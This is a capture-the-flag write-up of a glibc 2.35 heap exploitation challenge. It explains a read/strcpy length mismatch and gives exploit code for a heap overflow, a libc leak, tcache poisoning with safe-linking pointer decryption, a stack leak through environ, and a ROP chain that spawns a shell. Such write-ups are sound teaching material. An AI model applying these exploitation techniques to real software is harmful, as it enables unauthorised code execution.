exploit summary

the vulnerability in the program occurs within the edit function. When editing a rune, the new name is copied from the stack to the malloced ptr. it is read using read and copied to the heap using strcpy. this copied value is then used to grab the size value from the items list.

the error occurs in that read is able to read null bytes, and continue reading after. Whereas strcpy stops at the first null byte. The result of this is an incorrect lookup for the size of the malloced space. with this you can read more bytes than the size allocated to the malloc ptr you’re reading too.

This allows over write of the metadata for heap chunks, which in turn allows you to free into the unsort bins, putting a libc address on the stack. by then further abusing the overwrite, you can write right up to the ptr but not over it. then by using the show action on the overwritten chunk, and address can be leaked. – in my exploit when I wanted to leak I just wrote CHEF to 1 before the thing I wanted to leak so the new line (\n) char would not overwrite a part of the pointer. I like using CHEF when leaking like this lol

Bug Visualization

        stack       |          code          |          heap        
    +------------+  |                        |   +-----------+   
    |  new name  |----+-|\x01\x00\n|-----+   |   |    size   |<---------0x20
    +------------+  | |      1st    /    |   |   +-----------+     previously 
 +->|  new idx   |  | |  +------------+  | +-----|    name   |<-+  created chunk 
 |  +------------+  | | +|   hash     |<-+ | |   +-----------+  |  with a size of 
 |                  | | |+------------+    | |   |    data   |------+    0x20
 +----[ 11 ]----------|-+                  | |   |           |  |   |
                    | |      2nd           | |   +-----------+  |   |
    same as above   | |  +------------+    | |                  |   |
    +------------+  | +->|   strcpy   |----|----|"\x01"|--------+   |
    |  new idx   |  |    +------------+    | |  now no newline after|
    +------------+  |        3rd           | |  this is insertied   |
      ^             |    +------------+    | |  into the heap       |
       \-[ 1 ]-----------|   hash     |<---+ |                      |
           |        |    +------------+      |                      |
           |        |       final            |                      |
           |        |    +------------+      |                      |
           +------------>|   read     |<----------------------------+
        size from idx 1  +------------+      |  heap ptr for idx 11
          i.e. 0x60           |              |    size 0x20
                    Size and chunk size mismatch
                    resulting in a heap overflow

Sorry for making it so complicated, but it was very hard to figure out!

This is the backbone for the rest of my exploit, it enables everything else

Code Block

vulnerable code snippet

Example code

The snippet of code below allocates 2 chunks, one small chunk at the start, and a larger chunk beneath it.

next, you edit the small chunk, but give it the new name of \x3f\x00 since I am sending a line, a \n or \x0a is appended to the end of the new name

the result is the first lookup thinks that the item at index 9 ((0x3f + 0xa) % 0x3f = 0x9) is not in use, so it is safe to alloc there. But, because of the strcpy when calculating the hash for reading to the allocation it gets the index of 0x3f which contains the size of 0x60.

#allocate a small block at the start of the heap
create_rune(r, 'a', 8, "B"*7) #target

#make a larger block, the size is important for overwriting the it's values
create_rune(r, 'u', 96, "C"*95) #victim chunk

#make the larger chunk even bigger! with a size of 0x431 it is considered an unsorted chunk
edit_rune(r, 'a', '\x3f\x00', "A"*0x10+p64(0x431))

Leaking Libc


by freeing our unsorted bin, a pointer to libc is placed in the heap. to grab it, just use the same overwrite technique as above, write just to the pointer and the grab it/parse it

delete_rune(r, 'u')

#overwrite up to the pointer to grab it
edit_rune(r, '\x3f\x00', '\x3e\x00', "A"*0x13+"CHEF") # use the s allocation to overwrite the metadata
libc_leak = parse_leak(r, '\x3e\x00')

#fix the metadata for the unsorted bin, this is where the 0x18 size item comes in handy
edit_rune(r, '\x3e\x00', '\x3a\x00', "A"*0x10+p64(0x431))

parse leak

def parse_leak(r, name):
    sla(r, 'Action:', 4)
    sla(r, ':', name)
    ru(r, "CHEF\n")
    leak = u64(re(r,6)+'\x00\x00')
    return leak

Poisoning tcache

this is very similar to what I did above, for more information I’d recommend checking out how to heap’s github page!

free 2 rune’s of the same size, and leave one above them alloced use the same techinque as above to leak the ciphered pointer

leak the ciphered pointer

    create_rune(r, p64(33)[:-1], 0x30, 0)
    create_rune(r, p64(34)[:-1], 0x30, 0)
    create_rune(r, p64(35)[:-1], 0x30, 0)

#... other code between these

    delete_rune(r, p64(35)[:-1])
    delete_rune(r, p64(34)[:-1])

    #same deal to overwrite the meta data
    edit_rune(r, p64(33)[:-1], '\x3d\x00', "A"*0x33+"CHEF")

    #grab a ciphered ptr
    weird_ptr = parse_leak(r, '\x3d\x00')

	plain_ptr, key = decrypt_ptr(weird_ptr)

more information on why this works can be found here


def decrypt_ptr(cipher):
    key = 0
    plain = ''

    cipher = cipher
    for i in range(6):
        bits = 64-12*i
        if bits < 0:
            bits = 0
        plain = ((cipher ^ key) >> bits) << bits;
        key = plain >> 12
    print hex(key)
    print hex(plain)
    print hex(cipher)

    return plain, key


calculate the pointer you would like malloc to return. xor that pointer with the key calculated before overwrite the pointer in the target chunk with the pointer you’d like malloc twice, the 2nd malloc will return a pointer to the localtion of you’re choosing!

environ_libc = 0x1FAEC0 + libc_base #enviorn
log.info("environ: {}".format(hex(environ_libc)))
environ_cipher = (environ_libc-0x10) ^ key
edit_rune(r, '\x3d\x00', '\x3c\x00', 'A'*0x30+p64(0x21)+p64(environ_cipher))

create_rune(r, p64(36)[:-1], 0x30, "B")
#overwrite up to the leak so that puts includes it
create_rune(r, p64(35)[:-1], 0x30, "A"*3+"CHEF")
stack_leak = parse_leak(r, p64(35)[:1])

defeating glibc 2.35 restrictions

glibc removes the use of __malloc_hook and __free_hook, making their use in this challenge impossible

that being said, by freeing a chunk to an unsorted bin, we still have access to a write what where primative. This is a super powerful primative, and enables lots of other things

I did read online that you could write to the exit_function_list and get RCE that way, but I couldn’t figure out the pointer decryption. On top of that, there are very few calls to exit from the program. only can be done with a failed read. So, I tried something else.

ROPing with no stack BOF

I love ROP chain’s, especially with libc leaked, you can do almost anything. the problem is, right now we only have a pointer to libc, not the stack. can we change that?

Introducing….. the environ variable! (this is what I was leaking above) the environ variable in libc contains a pointer the environment variables for the process, which just so happens to be on the stack!

It also is in a relatively static location, allowing for deterministic offset calculation

I chose to use this by mallocing a chunk right on top of the return address for the create function call that malloc’ed it.

by doing this I could us up to 12 ROP gadgets!! although the way mine ended up working out, I only allocated enough space for 10. for more I would have needed to change the way my script works quite a bit.

10 is more than enough anyways!


similar to above, this time we want to write to the stack

edit_rune(r, p64(37)[:-1], '\x3f\x00\x01', "A"*0x53+"CHEF")

#leak the pointer so I can properly overwrite the next pointer in the tchace
new_cipher = parse_leak(r, '\x3f\x00\x01')
plain_ptr, key = decrypt_ptr(new_cipher)

log.info("2nd ptr: {}".format(hex(plain_ptr)))

edit_rune(r, '\x3f\x00\x01', '\x3f\x00\x02', "Z"*0x50+ p64(0x51)+p64(stack_write ^ key))

create_rune(r, p64(41)[:-1], 0x50, 'Y')

something else interesting…

Usually, with the challenges I like to call a one_gadget. They are perticuarly handy with rop chains as you usually just need to pop null into some registers and call the gadget

However, with this challenge you can’t! I’m not sure if it is a new feature of libc, or if it is custom configured, but when I tried to call the one gadget I got an error that file execvpe.c not found. So, I had to think a bit harder

the final chain

My final chain was quite simple, since there is a gadget to pop rdx, and a syscall gadget. I just manually populated the registers with 4 different pop $ calls, and then ended with a syscall!

rop chain

    pop_rsi = libc_base + 0x0000000000037c2a#: pop rsi; ret;
    pop_rdx = libc_base + 0x000000000010b127#: pop rdx; ret;
    syscall = libc_base + 0x00000000000883d6#: syscall; ret;
    pop_rax = libc_base + 0x00000000000446e0#: pop rax; ret;
    bin_sh  = libc_base + 0x1B4689
    pop_rdi = libc_base + 0x000000000002daa2#: pop rdi; ret#

    #build a rop chain to call the execve syscall with the correct values
    payload = p64(pop_rsi)
    payload += p64(0)
    payload += p64(pop_rdi)
    payload += p64(bin_sh) #address of /bin/sh in libc
    payload += p64(pop_rdx)
    payload += p64(0)
    payload += p64(pop_rax) #its lucky there was a pop rax gadget
    payload += p64(59)
    payload += p64(syscall)

    log.info("writting rop chain over create's return ptr")
    #write the rop chain to the leaked stack ptr
    create_rune(r, p64(39)[:-1], 0x50, payload)

    log.info("enjoy the shell ;)")

Final thoughts

All in all this was a really fun challenge and I learned a ton! It was very rewarding to finally figure out the vulnerability, it took me a looooong time to find it. probably about 7 or so hours.

Then, with that getting the write what where vulnerability and figuring out I can’t just overwrite the __malloc_ptr was very shocking! It forced me to read other’s writeup’s and learn about how a modern version of libc works.

I’m also very happy with the way I finally code code execution, it felt like I used every trick I knew! So, to wrap things off, here is a list of the techinques I used, and pieces of knowledge that helped me!

Techiniques/knowledge used: - strcpy copies to a null byte, while read doesn’t stop at a null byte - freeing a chunk into an unsorted bin places a libc pointer on the heap - puts also prints until a null byte (allowing full leaks) - heap ptr’s can be deciphered. read more here - tcache poisoning. read more here - ROP chaining - (not a techinque) carefully following how data/handles are passed around from function call to function call

What I learned: - environ variable in LIBC contains a pointer to the stack - in glibc 2.35 __malloc_hook, __free_hook, and __realloc_hook are useless :( - exit_function_list can be overwritten for RCE on an exit call - sometimes one gadgets don’t work!